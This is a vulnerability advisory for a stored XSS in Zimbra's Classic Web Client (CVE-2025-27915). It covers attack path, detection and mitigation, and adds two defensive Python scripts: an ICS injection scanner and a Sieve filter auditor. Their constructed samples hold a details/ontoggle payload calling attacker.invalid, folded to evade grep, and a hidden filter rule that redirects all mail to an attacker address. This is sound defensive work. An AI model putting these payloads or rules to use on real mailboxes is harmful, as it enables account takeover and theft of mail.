CVE Alert: CVE-2025-27915
CVE-2025-27915
An issue was discovered in Zimbra Collaboration (ZCS) 9.0 and 10.0 and 10.1. A stored cross-site scripting (XSS) vulnerability exists in the Classic Web Client due to insufficient sanitization of HTML content in ICS files. When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event inside a <details> tag. This allows an attacker to run arbitrary JavaScript within the victim’s session, potentially leading to unauthorized actions such as setting e-mail filters to redirect messages to an attacker-controlled address. As a result, an attacker can perform unauthorized actions on the victim’s account, including e-mail redirection and data exfiltration.
AI Summary Analysis
Risk verdict
Active exploitation is being reported for this stored XSS in the Zimbra Classic Web Client; patching should be treated with high urgency.
Why this matters
Successful abuse lets an attacker run arbitrary JavaScript in the victim's web-client session, which is enough to perform any action the user can perform there, such as creating a mail filter that redirects incoming messages to an attacker-controlled address or reading and exfiltrating mailbox data. The vector is network-delivered and needs only that the victim view the message, so the direct impact is limited to the victim's account; a redirect rule, however, outlives the session and gives the attacker an ongoing copy of incoming mail, including password-reset and other credential-bearing messages, so credential loss and targeted information leakage follow.
Most likely attack path
An attacker sends an e-mail carrying a crafted calendar (ICS) entry whose HTML contains a <details> element with an ontoggle handler. When the recipient views the message in the Classic Web Client, the handler fires and the embedded JavaScript runs in the victim's session; no further click is needed. Attack complexity is low and no privilege beyond the ability to deliver mail is required, the one prerequisite being that the victim opens the message. From there the attacker acts as the user inside the mailbox (for example, creating filter rules that forward incoming mail) and can use the compromised mailbox to phish other users in the same organisation or to read data shared with it, so exposure can extend beyond the first victim depending on mail-flow rules and sharing permissions.
Who is most exposed
Organisations running on-premises or hosted Zimbra Collaboration 9.0, 10.0 or 10.1 whose users read mail in the Classic Web Client, especially where calendar invites from external senders reach end users routinely.
Detection ideas
- Mail filter or forwarding rules created or modified shortly after a user opened a calendar invite, above all rules that redirect mail to an external domain or discard it
- Inbound ICS attachments or calendar parts whose HTML carries event-handler attributes (ontoggle on a <details> element is the reported vector, but any on* attribute is suspect), <script> tags or javascript: URLs
- Unexpected changes to mailbox preferences or filter settings made from a web session that had just rendered a calendar item
- Requests from users' Zimbra web sessions to hosts the organisation does not normally contact, since the injected script needs a path back to the attacker, together with user reports of odd client behaviour
- Mail gateway or IDS/IPS signatures for ICS content containing HTML with script or event-handler attributes
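A gateway-side check for the second and fifth detection ideas above, added here as an example and not code from Zimbra or from the original alert: it unfolds an ICS file per RFC 5545, decodes the TEXT escapes and reports every property whose HTML contains the <details>/ontoggle pair the CVE describes or any other on* handler, <script> tag or javascript: URL. The sample invite and the host attacker.invalid are constructed for the example; the handler name in the sample is split across a folded line to show why a grep over the raw file is not enough.

```python
"""Scan iCalendar (ICS) content for script injection in HTML property values.

Added example for this advisory (not Zimbra code). It looks for the pattern the
CVE text describes, a <details> element carrying an ontoggle handler, plus other
on* handlers, <script> tags and javascript: URLs, in every property of an ICS
file. Lines are unfolded per RFC 5545 first, so a handler name split across a
folded line is still caught, and TEXT escapes (\\, \\n) are decoded.
"""
import re
from typing import Dict, List, Tuple

# RFC 5545 s.3.1: CRLF (or LF) followed by one space or tab continues the line.
_FOLD = re.compile(r"\r?\n[ \t]")
# RFC 5545 s.3.3.11 TEXT escapes, decoded in a single pass.
_ESCAPES = {"\\n": "\n", "\\N": "\n", "\\,": ",", "\\;": ";", "\\\\": "\\"}
_ESCAPE_RE = re.compile(r"\\[nN,;\\]")

# Indicators of HTML that would execute script when rendered by a web client.
INDICATORS = {
    "details_ontoggle": re.compile(r"<details\b[^>]*\bontoggle\s*=", re.I | re.S),
    "event_handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.I | re.S),
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "javascript_uri": re.compile(r"(?:href|src|action)\s*=\s*[\"']?\s*javascript:", re.I),
}


def unfold(ics: str) -> str:
    """Join folded continuation lines back into single content lines."""
    return _FOLD.sub("", ics)


def unescape_text(value: str) -> str:
    """Decode TEXT escapes in one pass, so an escaped backslash followed by n
    yields a literal backslash + n rather than a newline."""
    return _ESCAPE_RE.sub(lambda m: _ESCAPES[m.group(0)], value)


def _split_content_line(line: str):
    """Split 'NAME;PARAM="a:b":value' at the first ':' outside double quotes."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            return line[:i], line[i + 1:]
    return None


def properties(ics: str) -> List[Tuple[str, str, str]]:
    """Return (name, params, raw_value) for each content line of the file."""
    out = []
    for line in unfold(ics).split("\n"):
        line = line.rstrip("\r")
        parts = _split_content_line(line)
        if parts is None:
            continue
        head, value = parts
        name, _, params = head.partition(";")
        out.append((name.upper(), params, value))
    return out


def scan_ics(ics: str) -> List[Dict[str, str]]:
    """Report every property whose decoded value contains an injection indicator."""
    findings = []
    for name, _params, raw in properties(ics):
        text = unescape_text(raw)
        if "<" not in text:  # no markup, nothing a client would render
            continue
        for label, pattern in INDICATORS.items():
            m = pattern.search(text)
            if m:
                findings.append({"property": name, "indicator": label,
                                 "match": m.group(0)[:80]})
    return findings


# Constructed sample invite: the ontoggle handler is deliberately split across a
# folded line, which defeats a naive grep on the raw file. attacker.invalid and
# example.invalid are placeholder hosts.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "PRODID:-//constructed sample//EN\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:sample-1@example.invalid\r\n"
    "DTSTART:20250101T090000Z\r\n"
    "SUMMARY:Budget review\r\n"
    'ORGANIZER;CN="Ops: Team":mailto:ops@example.invalid\r\n'
    "X-ALT-DESC;FMTTYPE=text/html:<html><body><details open onto\r\n"
    " ggle=\"fetch('https://attacker.invalid/?b=1')\"><summary>Agenda\r\n"
    " </summary></details></body></html>\r\n"
    "DESCRIPTION:Plain agenda text\\, nothing to render here.\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

if __name__ == "__main__":
    assert "ontoggle" not in SAMPLE_ICS  # a raw grep would miss the folded handler
    for f in scan_ics(SAMPLE_ICS):
        print(f"{f['property']}: {f['indicator']} -> {f['match']}")
```

This is a triage signal for mail-flow tooling or SIEM enrichment, not a sanitizer: it scans every property (SUMMARY and LOCATION included, not only the description fields), but it does not decode HTML entities or base64/quoted-printable MIME encodings, so hand it the decoded attachment body. On the client side the fix is the vendor patch, not a pattern filter.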
Mitigation and prioritisation
- Apply the vendor fix: upgrade to a patched release named in Zimbra's security advisory for this CVE (the latest patched 10.1, 10.0 or 9.0 build, as applicable).
- If patching is delayed, use compensating controls: strip or quarantine ICS attachments from external senders at the gateway where feasible, filter HTML in calendar content, and consider moving users off the Classic Web Client, which is the only client the description names as affected (confirm scope against the vendor advisory).
- Monitor filter and forwarding configuration: alert on newly created redirect rules and on rapid rule churn, and audit each account's Sieve filter script and forwarding-address settings on a schedule.
- Strengthen user awareness of unsolicited calendar invites and odd calendar items, and give the incident response team guidance for a suspected session compromise (invalidate the user's sessions, reset the password, review filters and forwarding).
- Plan a targeted patch window and verify remediation in a staging environment before broad rollout.
- After patching, sweep every mailbox for filters and forwarding addresses added during the exposure window and remove malicious ones: the patch stops new injection but does not undo rules already planted.
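A check for the rule-monitoring items in the detection and mitigation lists above, added as an example and not Zimbra tooling. It assumes you have already pulled an account's filter script and forwarding attributes: Zimbra keeps the filters as a Sieve script in the LDAP attribute zimbraMailSieveScript and forwarding targets in zimbraPrefMailForwardingAddress and zimbraMailForwardingAddress, all readable with zmprov ga <account> <attr> (parsing that CLI output is left to the caller). The layout assumed for the script, a "# <rule name>" comment followed by the rule's if-block, follows what the filter UI writes; the sample script, the address collector@attacker.invalid and the domain example.invalid are constructed.

```python
"""Audit Zimbra per-account filter rules and forwarding settings for exfiltration.

Added example for this advisory (not Zimbra tooling). Input is the text of an
account's zimbraMailSieveScript plus its forwarding attributes, as fetched by
the caller (e.g. zmprov ga <account> <attr>). The Sieve layout assumed here, a
'# <rule name>' comment followed by the rule's if-block, is what Zimbra's
filter UI writes; check it against your build.
"""
import re
from typing import Dict, Iterable, List

# Sieve actions an attacker plants after hijacking a session: redirect copies mail
# out, discard hides the original so the victim never notices the redirect.
_REDIRECT = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"\s*;', re.I)
_DISCARD = re.compile(r"\bdiscard\s*;", re.I)
# Zimbra precedes every rule with a comment line holding the rule name.
_RULE_NAME = re.compile(r"^\s*#\s*(.+?)\s*$", re.M)

FORWARDING_ATTRS = ("zimbraPrefMailForwardingAddress", "zimbraMailForwardingAddress")


def is_external(address: str, org_domains: Iterable[str]) -> bool:
    """True when the address's domain is not one the organisation owns."""
    domain = address.rsplit("@", 1)[-1].strip().lower()
    return domain not in {d.lower() for d in org_domains}


def split_rules(script: str):
    """Yield (rule_name, body); text before the first rule comment is '(prelude)'."""
    parts = _RULE_NAME.split(script)
    if parts[0].strip():
        yield "(prelude)", parts[0]
    for i in range(1, len(parts), 2):
        yield parts[i], parts[i + 1]


def audit_sieve(script: str, org_domains: Iterable[str]) -> List[Dict[str, str]]:
    """Flag redirect and discard actions; redirects to external domains rate high."""
    findings = []
    for name, body in split_rules(script):
        for m in _REDIRECT.finditer(body):
            target = m.group(1)
            findings.append({
                "rule": name, "action": "redirect", "target": target,
                "severity": "high" if is_external(target, org_domains) else "medium",
            })
        if _DISCARD.search(body):
            findings.append({"rule": name, "action": "discard", "target": "",
                             "severity": "medium"})
    return findings


def audit_forwarding(attrs: Dict[str, str], org_domains: Iterable[str]) -> List[Dict[str, str]]:
    """Flag forwarding addresses; attribute values may be comma- or newline-separated."""
    findings = []
    for attr in FORWARDING_ATTRS:
        for addr in re.split(r"[,\s]+", attrs.get(attr, "")):
            if addr:
                findings.append({
                    "rule": attr, "action": "forward", "target": addr,
                    "severity": "high" if is_external(addr, org_domains) else "medium",
                })
    return findings


# Constructed sample: one legitimate rule, then a rule named "." (a name chosen
# to be overlooked in the filter list) that redirects all mail to an external
# address and discards the original. attacker.invalid is a placeholder.
SAMPLE_SIEVE = '''require ["fileinto", "reject", "tag", "flag"];

# Invoices to Finance folder
if anyof (header :contains "subject" "invoice") {
    fileinto "Finance";
    stop;
}

# .
if true {
    redirect "collector@attacker.invalid";
    discard;
    stop;
}
'''
SAMPLE_ATTRS = {"zimbraPrefMailForwardingAddress": "collector@attacker.invalid"}
ORG_DOMAINS = ["example.invalid"]

if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SIEVE, ORG_DOMAINS) + audit_forwarding(SAMPLE_ATTRS, ORG_DOMAINS):
        print(f"[{f['severity']}] rule={f['rule']!r} {f['action']} {f['target']}")
```

Run it per account from a scheduled job (for example, over the account list zmprov -l gaa returns) and diff the findings against the previous run: a new high-severity entry, or a rule name that is a single dot or otherwise blank, is the "rapid rule churn" signal the mitigation list asks for. Internal redirects are rated medium because delegation rules between colleagues are common and need a human look rather than an automatic alert.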